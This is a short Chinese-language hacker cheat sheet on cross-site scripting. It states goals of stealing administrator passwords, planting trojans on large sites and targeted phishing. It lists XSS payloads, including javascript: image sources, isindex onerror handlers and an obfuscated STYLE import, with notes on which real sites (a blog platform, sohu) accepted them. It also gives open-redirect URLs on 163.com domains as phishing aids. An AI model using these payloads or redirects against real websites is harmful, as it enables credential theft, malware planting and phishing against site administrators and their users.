XSS使用基础

XSS使用基础

-----------------------------------------------------------

1，主要针对小网站--钩管理员的密码，后台

2，大网站--直接挂马，在管理员关注的偏区，钩密码，后台

3，进行针对性的钓鱼社工

------------------------------------------------------------

 

 

获取COOKIES

钓鱼功能

挂鱼

 

<img src=javascript:alert('www.google.com')>  //博客可用

 

<iframe src="http://www.google.com";width="120";height="120";frameborder="0">/ //被过滤了

 

<img src=j ava script:wi ndow.op en('http://www.google.com')>    //没有弹出

 

 

/" DYNSRC="javascript:alert('www.google.com')"sohu的和其他有点不同。在回复才能触发跨站
<isindex type=image src=1 onerror=alert(1)>  //alert为内容

 

<isindex type=image onerror=alert(1) src=>   //alert为内容

 

 

<P><STRONG>　　　　<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>　　　　</STRONG></P>语法变换看--ASCII码转换http://tools88.com/safe/ASCIIConverter.php
Title?  
Title?  
国内黑客资料收集 

 

Flash:

http://player.youku.com/player.php/sid/XMTc0NTIxMDg0/v.swf

<embed src="http://player.youku.com/player.php/sid/XMTc0NTIxMDg0/v.swf" quality="high" width="480" height="400" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash"></embed>

http://v.youku.com/v_show/id_XMTc0NTIxMDg0.html

 

跨站漏洞：

搜索框；

数据填框；

                       alert(/当当网跨站/)

                       alert(/www.google.com/)

网页误导

跳转漏洞

 

http://pro.163.com/event.ng/Type=&Redirect=http://www.baidu.com
http://allyes.nie.163.com/main/adfclick?bid=9191,4527,190&cid=637,4,1&db=afanie&show=ignore&sid=9413&url=http://www.baidu.com

 

发漏基础；；网页---验证， 推荐好友，  推广